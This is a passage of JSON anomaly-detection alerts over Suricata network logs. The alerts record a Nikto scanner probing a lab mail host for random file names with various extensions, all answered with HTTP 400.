"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80", "/parser/model/time": 1583349514.206813, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46818, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xls", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20704, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xls\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xls\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46818, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2162825255068915, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80", "/parser/model/time": 1583349514.208607, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46820, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ini", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.208779, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":78486216256524,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46820, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":78486216256524,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 78486216256524, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80", "/parser/model/time": 1583349514.210292, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46822, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.inc+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.210515, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":684282763424512,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", 